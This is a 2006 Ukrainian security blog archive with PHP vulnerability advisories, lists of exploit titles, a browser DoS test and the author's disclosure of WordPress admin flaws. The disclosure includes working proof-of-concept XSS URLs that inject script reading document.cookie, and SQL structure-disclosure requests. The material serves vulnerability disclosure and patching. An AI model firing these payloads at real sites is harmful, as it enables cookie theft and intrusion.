Архів за Жовтень, 2006

Уразливість на www.realtextads.com

22:45 19.10.2006

Деякий час тому, 29.08.2006, я знайшов Cross-Site Scripting уразливість на відомому проекті http://www.realtextads.com (рекламний брокер). Про що вже сповістив адміністрацію проекту на початку жовтня.

XSS:

Уразливість вже виправлена адміністрацією.

Цілочислене переповнення в PHP

20:40 19.10.2006

16.10.2006

Виявлене цілочислене переповнення в PHP (PHP integer overflow).

Уразливі версії: PHP 4 < 4.3.0, PHP 5 <= 5.1.6.

  • PHP unserialize() Array Creation Integer Overflow (деталі)

19.10.2006

Цілочислене переповнення буфера в PHP.

Уразливість дозволяє віддаленому користувачу викликати відмовлення в обслуговуванні чи виконати довільний код на цільовій системі.

Цілочислене переповнення буфера виявлене у функції “_ecalloc”. Віддалений користувач може за допомогою спеціально сформованого запиту виконати довільний код на цільовій системі, якщо PHP сценарій розподіляє пам’ять на підставі вхідних даних.

Рекомендую встановити виправлення для PHP інтерпретатору.

  • Цілочислене переповнення в PHP (деталі)
  • Целочисленное переполнение буфера в PHP (деталі)

Добірка експлоітів

13:36 19.10.2006

В даній добірці експлоіти в веб додатках:

  • ProgSys <= 0.151 (RR.php) Remote File Include Exploit (деталі)
  • phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability (деталі)
  • PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability (деталі)
  • pNews <= 1.1.0 (nbs) Remote File Include Vulnerability (деталі)
  • Site@school remote file upload Xploit (деталі)

DoS для Mozilla, Firefox та Internet Explorer

21:44 18.10.2006

Новий тест для вашого браузера. На це раз для Mozilla, Firefox та Internet Explorer.

Даний тест повинен привести до припинення роботи вашого браузера (зависне браузер) - це DoS атака. Можете перевірити, чи вразливий саме ваш браузер (вашої версії) до даної атаки. Сам тест представляє собою простенький ява-скрипт, який нагадає вашому браузеру де зимують раки :grin: (суть атаки зводиться до генерації максимально можливої кількості вікон браузера - поки він не зависне).

Це трохи інший тест, ніж попередній в IE (Переповнення буфера в Internet Explorer). Не такий ефектний - всього лише DoS. Але зато отдразу в різних браузерах: в Mozilla, Firefox та IE (в Opera не тестував, можете самі перевірити).

Як показали мої перевірки - цей експлоіт підвисає браузери. В мене він підвісив і Mozilla і Firefox. Причому зауважу, що на одному сайті, де я довідався про дану атаку, писалося що вразливий саме Internet Explorer. Але в мене IE не підвісив (IE під XP SP2), зато підвісив Mozilla з Firefox. Лише відкрило масу вікон в IE, забравши частину оперативної пам’яті, але не всю, тому на ПК з меншою кількістю пам’яті, можливий інший ефект. Тому тестуйте свої браузери. І обновлюйте їх, якщо тест покаже невтішні результати.

Протестуйте ваш браузер: Mozilla Firefox IE DoS Exploit.

Обхід обмежень safe mode в PHP

19:11 18.10.2006

Можливий обхід обмежень safe mode в PHP. Уразливі версії: PHP <= 4.4.3, PHP <= 5.1.

Уразливість дозволяє локальному користувачу обійти обмеження безпеки.

Уразливість існує через помилку перевірки границь даних у функції "sscanf()" при обробці символу форматного рядка "$1s". Зловмисник може одержати доступ до звільненої пам'яті і обійти обмеження safe mode.

Рекомендую встановити останню версію PHP.

Додаткова інформація:

  • Обхід обмежень безпеки в PHP (деталі)
  • Обхід захисту PHP Safe Mode (деталі)
  • Обход ограничений safe mode в PHP (деталі)

Добірка уразливостей

18:20 18.10.2006

В даній добірці уразливості в веб додатках:

  • Wili-CMS Multiple Input Validation Vulnerabilities (деталі)
  • phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion (деталі)
  • Sun Secure Global Desktop prior 4.3 multiple remote vulnerabilities (деталі)
  • Wili-CMS Multiple Input Validation Vulnerabilities (деталі)
  • Grayscale BandSite CMS Multiple Input Validation Vulnerabilities (деталі)
  • BandSite CMS Cross-Site Scripting Vulnerabilities (деталі)
  • NixieAffiliate Multiple Vulnerabilities (деталі)
  • CakePHP “file” Parameter Disclosure of Sensitive Information (деталі)
  • Banex 2.21 multiple SQL injection vulnerabilities (деталі)
  • PHP-інклюдинг в Mambo Serverstat (деталі)

Численні уразливості в WordPress

23:10 17.10.2006

16.10.2006

До движка WordPress та плагінів під нього в мене особлива і підвищена увага - і я ругялярно провожу аудит безпеки WP (та його плагінів), тому що мій власний сайт базується на даному движку. І можу сказати, що WordPress, в якому нечасто знаходять уразливості (рідко ви про це прочитаєте в новинах секюріті сайтів), і саме за це я і вибрав даний движок, все ж таки має чимало уразливостей.

І чим більше я досліджую його, тим більше уразливостей знаходжу. Особливо уразливими є плагіни (які компроментують движок і сайт у цілому), зокрема плагіни сторонніх розробників, про що в новинах я писав неодноразово, але й в самому движку також є вразливості (і в тому ж плагіні WP-DB Backup, який входить до стандартної поставки движка WP).

До вже згаданих уразливостей в WordPress та його плагінах (Cross-Site Scripting в WP-PHPList, Уразливості в Subscribe To Comments WordPress plugin та Уразливість в Wordpress WP-DB Backup Plugin), я повідомляю про численні уразливості в самому Wordpress (а також в інших плагінах, з числа тих, якими я користуюся, і про що я окремо повідомлю).

Це зокрема Cross-Site Scripting уразливості в адмінці WP, які я зайшов в серпні (3 XSS) і вересні (2 XSS, а також одна SQL DB Structure Extraction). Це лише частина усіх знайдених мною уразливостей в Wordpress (вразливі версії до 2.0.3 включно, і може 2.0.4). Про ті уразливості (й їх чимало), що я знайшов в жовтні, а також про уразливсоті в інших плагінах для WP, я розповім окремо.

Найближчим часом я повідомлю деталі, але спочатку пофіскю ці всі уразливості на своєму сайті (тому за них не переживайте :-) ), а також повідомлю розробникам WordPress і всім тим людям, яким я попередньо вже про ці уразливості розповів, включаючи розробників WP. Зараз залишилося написати їм всім деталі уразливостей (ну і підготую рекомендації по їх виправленню).

17.10.2006

Додам ще про нові уразливості в WordPress (і які мали місце на моєму сайті), про які я також найближчим чамосом повідомлю розробникам цього движка.

Вчора Андрій, який якраз завітав подякувати мені за інформацію про уразливості на його сайті, повідомив мені, що він знайшов дві уразливості в мене на сайті. Що звичайно мене зацікавило :-) . Так от, після отримання детальної інформації від Андрія і перевірки, виявилось що на моєму сайті (в движку WP) є дві уразливості: SQL DB Structure Extraction (а не SQL Injection, як думав Андрій) та XSS - в пошуці по сайту.

Причому він використував дуже хитрий метод ;-) пошуку цих уразливостей. Який я планую додатково дослідити - це використання деяких специфічних символів, котрі при деяких випадках можуть привести до виведення помилки в SQL запиті - і відповідно до уразливостей SQL DB Structure Extraction та XSS.

Як я додатково перевірив різні скрипти, які входять до складу движка WordPress (в адмінці і в плагінах), ця уразливість також має місце окрім пошуку по сайту, ще в ряді скриптів. Додатково уразливість проявляється в 5 скриптах - в суммі 8 уразливостей. Враховуючи дві попередні уразливості в пошуку, загалом маємо 10 уразливостей (SQL DB Structure Extraction та XSS). Про них я повідомлю деталі піздніше, після повідомлення розробникам WP. Ці уразливості я вже виправив на сайті, тому за них не переживайте.

Дані уразливості не торкаються всіх сайтів на движку WordPress. Вони спрацьовують лише при деяких налаштуваннях БД (налаштуваннях кодування), які мають місце на моєму сайті, і можуть бути також на деяких інших сайтах. Тому це лише поодинокий випадок, який тим не менш має свої ризики, що при деяких налаштуваннях MySQL, може відбуватися помилка в запиті до БД, що приводить до уразливостей (XSS + SQL DB Structure Extraction).

Детальна інформація.

Знайдено 24.08.2006.

XSS:

http://site/wp-admin/templates.php?file=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 29.08.2006.

XSS:

http://site/wp-admin/inline-uploading.php?action=upload&all=true&start=-%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/inline-uploading.php?action=upload&all=true%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 01.09.2006.

XSS:

POST запит на сторінці http://site/wp-admin/link-import.php
<script>alert(document.cookie)<script>В полі: Вкажіть OPML URL.

Знайдено 16.09.2006.

XSS:

http://site/wp-admin/edit.php?m=&paged=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Знайдено 27.09.2006.

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?paged=-1

Знайдено 17.10.2006.

Дані уразливості працюють лише при специфічній конфігурації кодування на сайті (при специфічних налаштуваннях БД, в даному випадку MySQL). Коли на сайті наявне UTF-8 кодування, в БД встановлене інше кодування (наприклад, Windows-1251) і в коді движка задане примусове встановлення UTF-8 кодування.

SQL DB Structure Extraction:

http://site/?s=%A0
http://site/wp-admin/edit.php?s=%A0
http://site/wp-admin/edit-pages.php?s=%A0
http://site/wp-admin/edit-comments.php?s=%A0

XSS:

http://site/?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-pages.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/edit-comments.php?s=%A0%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/wp-admin/edit.php?page=subscribe-to-comments.php&email=%A0
http://site/wp-subscription-manager.php?page=subscribe-to-comments.php&email=%A0

Взлом офіційного блога Google

21:06 17.10.2006

Декільа днів тому Google зіштовхнулася з неприємностями, пов’язаними з офіційним блогом компанії. Як повідомляє security.compulenta.ru, невідомий зловмисник опублікував у блозі фальшиве повідомлення, в якому говорилося про припинення співробітництва між Google і одним із самих великих онлайнових аукціонів eBay.

Google і eBay уклали багаторічну угоду про співробітництво в серпні нинішнього року. У фальшивому повідомленні вказувалося, що Google і eBay прийняли рішення зупинити проект click-to-call, оскільки порахували його занадто “монополістичним”.

Представниця Google на сторінках блога відзначає, що взлом був здійснений через діру в системі Blogger. У Google також підкреслюють, що уразливість усунута, а про припинення співробітництва з eBay мови не йде, і всі роботи виконуються відповідно до графіка.

Я вже раніше згадував про проблеми з безпекою на сайтах Гугла: XSS уразливість в Гуглі, XSS та CSRF уразливості в Google.

Уразливість на www.getinfo.ru

20:00 17.10.2006

28.09.2006

В минулому місяці, 27.08.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://www.getinfo.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.10.2006

XSS:

Уразливість вже попередньо виправлена адміністрацією (вони взагалі відключили розділ “Розсилка” де була виявлена уразливість).

Добірка експлоітів

15:42 17.10.2006

В даній добірці експлоіти в веб додатках:

  • Exponent CMS <= 0.96.3 (view) Remote Command Execution Exploit (деталі)
  • BCWB <= 0.99 (root_path) Remote File Include Vulnerability (деталі)
  • PhpBlueDragon CMS <= 2.9.1 (XSS/SQL) Code Execution Exploit (деталі)
  • SolidState <= 0.4 Multiple Remote File Include Vulnerabilities (деталі)
  • PHP-post remote sql injection make phpshell (деталі)